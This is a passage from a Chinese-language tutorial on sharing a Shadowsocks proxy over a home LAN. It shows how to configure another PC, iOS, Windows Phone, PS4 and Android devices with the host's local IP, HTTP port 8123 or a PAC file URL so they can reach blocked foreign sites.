怎么样,是不是够高级了,错!
下面还有,更厉害的。
如果你在使用路由器上网,那么你的其他连接这个路由器的设备也可以共享你的这个HTTP代理。
这下什么手机,平板,都可以共享一个代理了。
具体教程在仔细往下看:
首先共享Shadowsocks到局域网。还是右击右下角的小飞机,选择Share Over Lan,如图:

这样就可以了。
然后查看你本机的局域网ip。这个查看方法很多种。
可以通过简单的命令行查看。
开始-运行,输入cmd然后回车,在弹出的窗口中输入ipconfig,就会有如下显示了:

看到没。Ip Address后面的就是了。我的局域网ip是192.168.0.101.
这样就好了。
现在我的本地局域网内就有一条ip为192.168.0.101端口为8123的http代理了。
切记你的局域网ip是什么,生成的http代理就是什么。不一定是192.168.0.101
下面就可以在其他设备中使用了。
比如别的电脑中。
如同上面一样,把别的电脑的ie浏览器http代理设置为192.168.0.101端口8123或者直接用pac文件
http://192.168.0.101:8090/pac都可以访问国外的网站了。2
上面是电脑的设备。也可以在移动设备中使用。
比如IOS中:我没有ios设备,截图是从网络上找的,所以大家凑合看。
进入设置,找到无线局域网

下一步就是填写pac文件,嗯,直接看图吧:
我这里是 http://192.168.0.101:8090/pac6
直接输入就可了。你可以修改成你自己的局域网ip然后填入。

这样就可以在iphone下访问国外网站了,打开浏览器试试,是不是可以看到youtube了?
这是iphone下,下面在来说下Windows phone下,方法也是类似的。
在设置-Wlan下找到你在使用的wifi。如图:

点击 ,然后进去设置下代理,如图:
把代理点击开启,输入你的局域网ip(我的是192.168.0.101)还有端口号8123. 这样保存就可以了。快试试是不是也可以翻墙了。
另外PS4等设备也可以用这个方法翻墙,奈何我没有PS4设备,无法截图给大家演示了.
进入【设定】-【网路】-【设置网际网路连接】-选择【使用wifi】-选择【自订】-选择你的wifi网络,输入密码。后面的ip地址、 dhcp、dns等等全部选择第一个选项,但是【Proxy服务器】要选择【使用】,然后输入电脑的ip地址我的是(192.168.0.101),以及 端口8123,这样就可以使用Shadowsocks代理了。
以下是我自己测试的andorid手机通过上面的办法自动翻墙
我自己的sony c6902 测试通过
具体是,设定>wlan>自己的wifi(长按)>(自动连接打勾)修改网 络>显示高级选项打勾>代理服务器主机名(你的IP),代理服务器端口8123,其他默认然后保存,结束。可以andorid手机自动翻了。 但只可以是电脑主机开着并SS运行的时候才可以实现手机自动翻墙。